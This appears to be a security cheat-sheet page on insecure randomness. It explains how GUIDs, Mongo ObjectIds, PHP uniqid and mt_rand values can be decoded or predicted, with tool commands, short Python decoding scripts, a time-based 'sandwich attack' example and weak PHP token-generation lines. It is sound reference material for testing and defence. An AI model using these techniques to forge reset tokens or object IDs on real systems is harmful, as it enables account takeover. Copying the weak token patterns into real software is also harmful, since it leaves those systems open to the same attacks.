# Insecure Randomness

## Summary

* [GUID / UUID](#guid--uuid)
    * [GUID Versions](#guid-versions)
* [Mongo ObjectId](#mongo-objectid)
* [Uniqid](#uniqid)
* [mt_rand](#mt_rand)
* [Other](#other)
* [References](#references)


## GUID / UUID

A GUID (Globally Unique Identifier) or UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify information in computer systems. They are typically represented as a string of hexadecimal digits, divided into five groups separated by hyphens, such as `550e8400-e29b-41d4-a716-446655440000`. GUIDs/UUIDs are designed to be unique across both space and time, reducing the likelihood of duplication even when generated by different systems or at different times.


### GUID Versions

Version identification: `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx` 
The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself.

| Version  | Notes  |
|----------|--------|
| 0 | Only `00000000-0000-0000-0000-000000000000` |
| 1 | based on time, or clock sequence |
| 2 | reserved in the RFC 4122, but omitted in many implementations |
| 3 | based on a MD5 hash |
| 4 | randomly generated |
| 5 | based on a SHA1 hash |


### Tools

* [intruder-io/guidtool](https://github.com/intruder-io/guidtool) - A tool to inspect and attack version 1 GUIDs
    ```ps1
    $ guidtool -i 95f6e264-bb00-11ec-8833-00155d01ef00
    UUID version: 1
    UUID time: 2022-04-13 08:06:13.202186
    UUID timestamp: 138691299732021860
    UUID node: 91754721024
    UUID MAC address: 00:15:5d:01:ef:00
    UUID clock sequence: 2099
    
    $ guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
    ```


## Mongo ObjectId

Mongo ObjectIds are generated in a predictable manner, the 12-byte ObjectId value consists of: 

* **Timestamp** (4 bytes): Represents the ObjectId’s creation time, measured in seconds since the Unix epoch (January 1, 1970).
* **Machine Identifier** (3 bytes): Identifies the machine on which the ObjectId was generated. Typically derived from the machine's hostname or IP address, making it predictable for documents created on the same machine.
* **Process ID** (2 bytes): Identifies the process that generated the ObjectId. Typically the process ID of the MongoDB server process, making it predictable for documents created by the same process.
* **Counter** (3 bytes): A unique counter value that is incremented for each new ObjectId generated. Initialized to a random value when the process starts, but subsequent values are predictable as they are generated in sequence.

Token example

* `5ae9b90a2c144b9def01ec37`, `5ae9bac82c144b9def01ec39`


### Tools

* [andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict) - Predict Mongo ObjectIds
    ```ps1
    ./mongo-objectid-predict 5ae9b90a2c144b9def01ec37
    5ae9bac82c144b9def01ec39
    5ae9bacf2c144b9def01ec3a
    5ae9bada2c144b9def01ec3b
    ```
* Python script to recover the `timestamp`, `process` and `counter`
    ```py
    def MongoDB_ObjectID(timestamp, process, counter):
        return "%08x%10x%06x" % (
            timestamp,
            process,
            counter,
        )

    def reverse_MongoDB_ObjectID(token):
        timestamp = int(token[0:8], 16)
        process = int(token[8:18], 16)
        counter = int(token[18:24], 16)
        return timestamp, process, counter


    def check(token):
        (timestamp, process, counter) = reverse_MongoDB_ObjectID(token)
        return token == MongoDB_ObjectID(timestamp, process, counter)

    tokens = ["5ae9b90a2c144b9def01ec37", "5ae9bac82c144b9def01ec39"]
    for token in tokens:
        (timestamp, process, counter) = reverse_MongoDB_ObjectID(token)
        print(f"{token}: {timestamp} - {process} - {counter}")
    ```


## Uniqid

Token derived using `uniqid` are based on timestamp and they can be reversed.

* [Riamse/python-uniqid](https://github.com/Riamse/python-uniqid/blob/master/uniqid.py) is based on a timestamp
* [php/uniqid](https://github.com/php/php-src/blob/master/ext/standard/uniqid.c)

Token examples

* uniqid: `6659cea087cd6`, `6659cea087cea`
* sha256(uniqid): `4b26d474c77daf9a94d82039f4c9b8e555ad505249437c0987f12c1b80de0bf4`, `ae72a4c4cdf77f39d1b0133394c0cb24c33c61c4505a9fe33ab89315d3f5a1e4`


### Tools

```py
import math
import datetime

def uniqid(timestamp: float) -> str:
    sec = math.floor(timestamp)
    usec = round(1000000 * (timestamp - sec))
    return "%8x%05x" % (sec, usec)

def reverse_uniqid(value: str) -> float:
    sec = int(value[:8], 16)
    usec = int(value[8:], 16)
    return float(f"{sec}.{usec}")

tokens = ["6659cea087cd6" , "6659cea087cea"]
for token in tokens:
    t = float(reverse_uniqid(token))
    d = datetime.datetime.fromtimestamp(t)
    print(f"{token} - {t} => {d}")
```


## mt_rand

Breaking mt_rand() with two output values and no bruteforce.

* [ambionics/mt_rand-reverse](https://github.com/ambionics/mt_rand-reverse) - Script to recover mt_rand()'s seed with only two outputs and without any bruteforce.

```ps1
./display_mt_rand.php 12345678 123
712530069 674417379

./reverse_mt_rand.py 712530069 674417379 123 1
```


## Other

Other bad ideas that are sometimes shipped into production.

* `$token = md5($emailId).rand(10,9999);`
* `$token = md5(time()+123456789 % rand(4000, 55000000));`

Generic identification and sandwitch attack: 

* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
    ```ps1
    reset-tolkien detect 660430516ffcf -d "Wed, 27 Mar 2024 14:42:25 GMT" --prefixes "attacker@example.com" --suffixes "attacker@example.com" --timezone "-7"
    reset-tolkien sandwich 660430516ffcf -bt 1711550546.485597 -et 1711550546.505134 -o output.txt --token-format="uniqid"
    ``` 


## References

* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html)
* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)
* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#)
* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - 06 January, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)